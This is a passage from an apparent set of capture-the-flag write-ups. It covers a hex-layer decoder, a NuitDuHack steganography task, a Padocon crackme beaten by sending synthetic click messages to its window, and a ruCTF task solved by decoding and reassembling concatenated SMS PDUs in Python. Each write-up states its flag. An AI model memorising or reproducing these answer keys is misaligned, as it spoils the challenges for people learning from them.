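    return s.isascii() and all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def peel(payload: str, max_layers: int = 32) -> tuple:
    """Decode while the current text is even-length hex and the result is still text.

    Returns (innermost text, number of layers removed). A plaintext that happens to
    consist only of hex digits (e.g. 'c0ffee') is left alone because its decoding is
    not ASCII text.
    """
    current, layers = payload.strip(), 0
    while layers < max_layers and len(current) % 2 == 0 and HEX_ONLY.match(current):
        nxt = decode_layer(current)
        if not looks_like_text(nxt):
            break
        current, layers = nxt, layers + 1
    return current, layers


def wrap(text: str, layers: int) -> str:
    """Constructed input generator, the inverse of peel, used only for the demo."""
    for _ in range(layers):
        text = text.encode("latin-1").hex()
    return text


if __name__ == "__main__":
    script = "function unlock(p){return p.length==5;}"     # made-up stand-in for the real code
    blob = wrap(script, 6)
    print(len(blob), peel(blob))
```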


Cheers,
thegrayone

NuitDuHack2013 Steganography 1

The question is:

"This time, take one LSB out of two, reverse the whole bit stream, add
a 0 every seven bits, uncompress, keep only one byte out of two and
you'll be done. Really."

We are given 2 attachments, bundled here:

bitmap.zip

Since it is only worth 1 point, it is quite straightforward. Unzip bitmap.zip and open the picture. The flag is written on the picture itself.

The flag is:
ffb19ff73f8268231392909c4b11ee56

Regards,
billa316

Padocon Qualifiers CTF 2010 : CatchMe - 200 Points


File given to us:
This is the original file:
CatchMeIfYouCan.zip


Recommended Tools:
Brains and Programming skills

Solving the Puzzle:
Let's fire up the binary which we are given.


Hmmmm... I can't seem to click on the button, which I guess I have to do in order to solve this:
the button moves away whenever I place my mouse cursor near it.
I could reverse the application, but I didn't want to spend too much time on that.

Thus, I've decided to make use of my development skills to solve this puzzle.

Logic behind this Solution:
Since moving my mouse cursor near the button will cause it to move away.

I've decided to send WM_LBUTTONDOWN (http://msdn.microsoft.com/en-us/library/windows/desktop/ms645607(v=vs.85).aspx) & WM_LBUTTONUP (http://msdn.microsoft.com/en-us/library/windows/desktop/ms645608(v=vs.85).aspx) messages with SendMessage function (http://msdn.microsoft.com/en-us/library/windows/desktop/ms644950(v=vs.85).aspx) to simulate the mouse cursor actions of clicking the button.

But in order to do that I need to get the window handle of CatchMeIfYouCan.exe.

So I used the FindWindow function (http://msdn.microsoft.com/en-us/library/windows/desktop/ms633499(v=vs.85).aspx) to look for the window titled "Catch Me If You Can!",
then got the window's client area with the GetClientRect function (http://msdn.microsoft.com/en-us/library/windows/desktop/ms633503(v=vs.85).aspx), which gives the range of coordinates to sweep.

Brute-Force Logic:
#include <stdio.h>
#include <windows.h>

int main(int argc, char *argv[]){
    HWND hWnd;
    RECT rect;
    LONG x, y;

    /* TEXT() picks the narrow or wide literal to match the build; the original
       L"..." literal only compiles when UNICODE is defined. */
    hWnd = FindWindow(NULL, TEXT("Catch Me If You Can!"));
    if (hWnd == NULL) {
        printf("window not found, is CatchMeIfYouCan.exe running?\n");
        return 1;
    }
    GetClientRect(hWnd, &rect);

    /* Sweep every client-area pixel with a synthetic click. The real cursor is
       never moved, so the "run away on mouse-over" logic is never triggered. */
    for (x = rect.left; x <= rect.right; x++) {
        for (y = rect.top; y <= rect.bottom; y++) {
            SendMessage(hWnd, WM_LBUTTONDOWN, 0, MAKELPARAM(x, y));
            SendMessage(hWnd, WM_LBUTTONUP, 0, MAKELPARAM(x, y));
        }
    }
    return 0;
}


Final Solution:
Once you have compiled the above code and run it, the button stops moving and you can click on it; you are then presented with a message box containing the solution, "Zntus_WARTG_gAng".


I have attached the source code for the brute-force application so that you can try it on your own.


File:CatchMeIfYouCan.c


cheers
0x4a61636f62

ruCTF 2013 Mobile 100 The Big Squeeze



The clue given is a txt file with a bunch of hexadecimal characters
sniffed.txt

Upon further research, and considering this is in the mobile category, these lines are actually SMS PDU traffic (the raw hex form in which GSM handsets and modems carry text messages)

You can read more about the format on these 2 sites:
http://www.gsmfavorites.com/documents/sms/pdutext/
http://www.codeproject.com/Tips/470755/Encoding-Decoding-7-bit-User-Data-for-SMS-PDU-PDU

The main difficulty is that in a PDU the 7-bit GSM alphabet characters (septets) are packed into 8-bit octets before transmission, so the text has to be unpacked bit by bit before it can be read.
The algorithm to decode them is described in the 2 links above.

There is a tool available called "PDUSpy" which can be downloaded here
Use PDUSpy to decode each line in the text file
Eventually, you will get to one line which gives you the text as shown below


Take note of the UDH Elements portion
It shows that this text file actually contains a concatenated SMS with 254 parts
The lines in the text file are also not arranged in sequence.

The challenge now is to decode and rearrange the SMS parts according to the "SM sequence number" to recover the full SMS
Decoding a concatenated SMS is slightly different. Refer to the page below for an explanation.
http://en.wikipedia.org/wiki/Concatenated_SMS

You could do it manually by decoding each line with PDUSpy and copying out the User Data (Text) portion to recover the SMS
OR you could write a script to do it
I wrote a PHP script that decodes the messages and saves them in a CSV file (do note that the 8-bit to 7-bit conversion and the PDU format are a PITA to understand -_-).
After which, I used some Excel magic to re-arrange the SMS sequence and recover the full SMS.
pduparser.php

Hey John. Here are the blueprints. Unfortunately my phone doesn't support MMS, so I had to find a workaround. 

The SMS contains a large chunk of encoded data
Decoding it with Base64 actually produces a png file


Yes, there is an image here, it has a transparent background and white lines, right click to download


Performing a google image search with that png will give you the flag "Hawker 4000"
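As an added example (not the author's pduparser.php), here is a Python decoder for the parts the write-up describes: septet unpacking, the SMS-DELIVER/SMS-SUBMIT header layout, the concatenation information element in the UDH, and reassembly by sequence number with a report of any missing parts. The sniffed file is not reproduced; build_deliver() constructs demo parts in the same wire format, with an assumed sender number and a zeroed timestamp, and the message text it wraps (ending in the base64 of a PNG header) is made up. The parser handles only the 7-bit default alphabet; 8-bit and UCS-2 payloads are rejected rather than mis-decoded.

```python
"""Decode GSM 7-bit SMS PDUs, read the concatenation UDH and reassemble the parts."""
import math

# GSM 03.38 default alphabet, index = septet value; the extension table follows ESC (0x1B).
GSM7 = ("@£$¥èéùìòÇ\nØø\rÅåΔ_ΦΓΛΩΠΨΣΘΞ\x1bÆæßÉ !\"#¤%&'()*+,-./0123456789:;<=>?"
        "¡ABCDEFGHIJKLMNOPQRSTUVWXYZÄÖÑÜ§¿abcdefghijklmnopqrstuvwxyzäöñüà")
GSM7_EXT = {0x0A: "\f", 0x14: "^", 0x28: "{", 0x29: "}", 0x2F: "\\",
            0x3C: "[", 0x3D: "~", 0x3E: "]", 0x40: "|", 0x65: "€"}
assert len(GSM7) == 128


def unpack_septets(octets: bytes, count: int) -> list:
    """Septet i occupies bits 7i..7i+6 of the octet stream read LSB-first."""
    n = int.from_bytes(octets, "little")
    return [(n >> (7 * i)) & 0x7F for i in range(count)]


def pack_septets(septets: list) -> int:
    """Inverse of unpack_septets; returned as an int so it can be shifted past a UDH."""
    return sum((s & 0x7F) << (7 * i) for i, s in enumerate(septets))


def septets_to_text(septets: list) -> str:
    out, esc = [], False
    for s in septets:
        if esc:
            out.append(GSM7_EXT.get(s, " "))
            esc = False
        elif s == 0x1B:
            esc = True
        else:
            out.append(GSM7[s])
    return "".join(out)


def text_to_septets(text: str) -> list:
    ext = {v: k for k, v in GSM7_EXT.items()}
    return [x for ch in text for x in ([0x1B, ext[ch]] if ch in ext else [GSM7.index(ch)])]


def swap_nibbles(data: bytes) -> str:
    """Addresses are BCD digits, low nibble first, F-padded to a whole octet."""
    return "".join(f"{b & 0xF:X}{b >> 4:X}" for b in data).rstrip("F")


def parse_pdu(hexline: str) -> dict:
    """Parse one SMS-DELIVER or SMS-SUBMIT PDU (SMSC prefix included) carrying 7-bit text."""
    b = bytes.fromhex(hexline.strip())
    pos = 1 + b[0]                                    # skip the SMSC address
    fo = b[pos]; pos += 1                             # TP first octet
    mti, udhi = fo & 0x03, bool(fo & 0x40)
    if mti == 1:                                      # SMS-SUBMIT carries TP-MR next
        pos += 1
    digits = b[pos]; pos += 2                         # address length (digits) + type-of-address
    addr = swap_nibbles(b[pos:pos + (digits + 1) // 2]); pos += (digits + 1) // 2
    dcs = b[pos + 1]; pos += 2                        # TP-PID, TP-DCS
    pos += 7 if mti == 0 else {0: 0, 2: 1, 1: 7, 3: 7}[(fo >> 3) & 3]   # TP-SCTS or TP-VP
    if dcs & 0x0C:
        raise ValueError("only the 7-bit default alphabet is handled here")
    udl, ud = b[pos], b[pos + 1:]
    concat, skip = None, 0
    if udhi:
        udhl, i = ud[0], 1
        while i < 1 + udhl:                           # walk the information elements
            iei, iedl = ud[i], ud[i + 1]
            if iei == 0x00:                           # 8-bit concatenation: ref, total, seq
                concat = dict(zip(("ref", "total", "seq"), ud[i + 2:i + 5]))
            i += 2 + iedl
        skip = math.ceil((udhl + 1) * 8 / 7)          # septets used up by the UDH + fill bits
    return {"address": addr, "concat": concat,
            "text": septets_to_text(unpack_septets(ud, udl)[skip:])}


def reassemble(hexlines: list) -> list:
    """Group parts by reference, join them in sequence order, report missing parts."""
    groups, out = {}, []
    for p in map(parse_pdu, hexlines):
        if p["concat"] is None:
            out.append({"ref": None, "missing": [], "text": p["text"]})
        else:
            groups.setdefault(p["concat"]["ref"], {})[p["concat"]["seq"]] = p
    for ref, seqs in groups.items():
        total = next(iter(seqs.values()))["concat"]["total"]
        out.append({"ref": ref, "missing": [s for s in range(1, total + 1) if s not in seqs],
                    "text": "".join(seqs[s]["text"] for s in sorted(seqs))})
    return out


def build_deliver(text: str, ref: int, total: int, seq: int, sender: str = "31612345678") -> str:
    """Constructed SMS-DELIVER part with a concatenation UDH (demo input, not sniffed data)."""
    udh = bytes([0x05, 0x00, 0x03, ref, total, seq])
    udh_septets = math.ceil(len(udh) * 8 / 7)         # 7 septets: 48 UDH bits + 1 fill bit
    septets = text_to_septets(text)
    ud_int = int.from_bytes(udh, "little") | pack_septets(septets) << (7 * udh_septets)
    udl = udh_septets + len(septets)
    ud = ud_int.to_bytes(math.ceil(udl * 7 / 8), "little")
    d = sender + "F" * (len(sender) % 2)
    oa = bytes.fromhex("".join(d[i + 1] + d[i] for i in range(0, len(d), 2)))
    tpdu = bytes([0x44, len(sender), 0x91]) + oa + bytes(2) + bytes(7) + bytes([udl]) + ud
    return "00" + tpdu.hex().upper()


def demo() -> dict:
    """Three parts of one constructed message, captured out of order like the challenge file."""
    secret = "Hey John. Here are the blueprints. iVBORw0KGgo="   # tail is base64 of a PNG header
    chunks = [secret[i:i + 20] for i in range(0, len(secret), 20)]
    lines = [build_deliver(c, 0x2A, len(chunks), n + 1) for n, c in enumerate(chunks)]
    return reassemble([lines[1], lines[2], lines[0]])[0]
```

To run it against a real capture, feed the lines of sniffed.txt to reassemble() and check the "missing" list of each group before trusting the joined text; the widely published reference PDU 07917238010010F5040BC87238880900F10000993092516195800AE8329BFD4697D9EC37 decodes with parse_pdu() to "hellohello" from 27838890001, which is a quick sanity check of the septet unpacking.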

Cheers,
thegrayone